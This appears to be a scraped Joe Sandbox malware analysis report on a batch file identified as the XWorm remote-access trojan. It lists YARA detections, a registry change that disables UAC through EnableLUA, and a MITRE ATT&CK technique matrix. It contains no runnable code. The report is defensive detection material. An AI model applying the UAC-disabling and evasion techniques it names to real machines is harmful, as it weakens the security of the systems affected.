Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Windows\System32\reg.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 64.2.powershell.exe.208006e8178.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.powershell.exe.26c57b16cb8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.powershell.exe.117de8f7d58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.powershell.exe.2002c7f3a58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.22801af67f0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.powershell.exe.26c57b12b58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.22801af2690.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 64.2.powershell.exe.208006e8178.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 64.2.powershell.exe.208006e4018.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.powershell.exe.117de8f3be0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.powershell.exe.2002c7ef8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000039.00000002.2339225011.00000117DEAC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2133873133.000002002C6C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2339225011.00000117DE7E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2238659527.0000026C579E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.1894952447.0000022801A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2238659527.0000026C57CE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2121324006.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000002.2420990292.00000208005B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.1894952447.0000022801CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2133873133.000002002C9C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000002.2420990292.00000208008B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8864, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 64.2.powershell.exe.208006e8178.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.powershell.exe.26c57b16cb8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.powershell.exe.117de8f7d58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.powershell.exe.2002c7f3a58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.22801af67f0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.powershell.exe.26c57b12b58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.22801af2690.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 64.2.powershell.exe.208006e8178.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 64.2.powershell.exe.208006e4018.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.powershell.exe.117de8f3be0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.powershell.exe.2002c7ef8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000039.00000002.2339225011.00000117DEAC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2133873133.000002002C6C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2339225011.00000117DE7E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2238659527.0000026C579E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.1894952447.0000022801A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2238659527.0000026C57CE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2121324006.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000002.2420990292.00000208005B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.1894952447.0000022801CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2133873133.000002002C9C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000040.00000002.2420990292.00000208008B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8864, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	212 Scripting	Valid Accounts	1 Native API	212 Scripting	1 DLL Side-Loading	21 Disable or Modify Tools	1 Input Capture	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	211 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	1 Input Capture	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	1 Obfuscated Files or Information	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	4 PowerShell	Login Hook	Login Hook	3 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	211 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report z1Documents_pdf_.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
z1Documents_pdf_.bat